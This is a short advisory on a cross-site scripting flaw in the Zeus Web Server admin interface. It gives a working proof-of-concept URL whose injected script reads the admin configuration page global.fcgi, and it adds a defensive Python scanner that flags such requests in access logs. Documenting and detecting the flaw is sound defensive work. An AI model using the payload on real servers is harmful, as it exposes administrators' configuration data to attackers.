Zeus Web Server Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability
The following proof of concept was provided:

http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")</script>
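
A defender-side check for the request pattern in the proof of concept above, added here as an example (it is not part of the original advisory or of Zeus): it scans access-log lines for requests to vs_diag.cgi whose decoded server parameter contains markup or script metacharacters. The Common Log Format input, the sample lines and the rule that a legitimate value contains no such characters are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter name are taken from the proof of concept on this page.
VULN_PATH = "/apps/web/vs_diag.cgi"
PARAM = "server"
# Assumption: a legitimate value is a plain server name without these characters.
SUSPICIOUS = re.compile(r"[<>\"'()]")
# Assumption: the access log uses Common Log Format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_requests(log_lines):
    """Return (line_number, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        try:
            url = urlsplit(match.group(1))
        except ValueError:  # malformed request target
            continue
        if unquote(url.path) != VULN_PATH:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = decode_fully(raw)
            if SUSPICIOUS.search(value):
                hits.append((number, value))
    return hits

# Constructed sample lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - admin [01/Jan/2024:13:55:36 +0000] "GET /apps/web/vs_diag.cgi?server=www1 HTTP/1.1" 200 5120',
    '192.0.2.44 - admin [01/Jan/2024:13:57:02 +0000] "GET /apps/web/vs_diag.cgi?server=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5342',
    '192.0.2.44 - admin [01/Jan/2024:13:58:11 +0000] "GET /apps/web/vs_diag.cgi?server=%253Cscript%253E HTTP/1.1" 200 5201',
    '192.0.2.10 - admin [01/Jan/2024:13:59:40 +0000] "GET /apps/web/global.fcgi HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE_LOG))
```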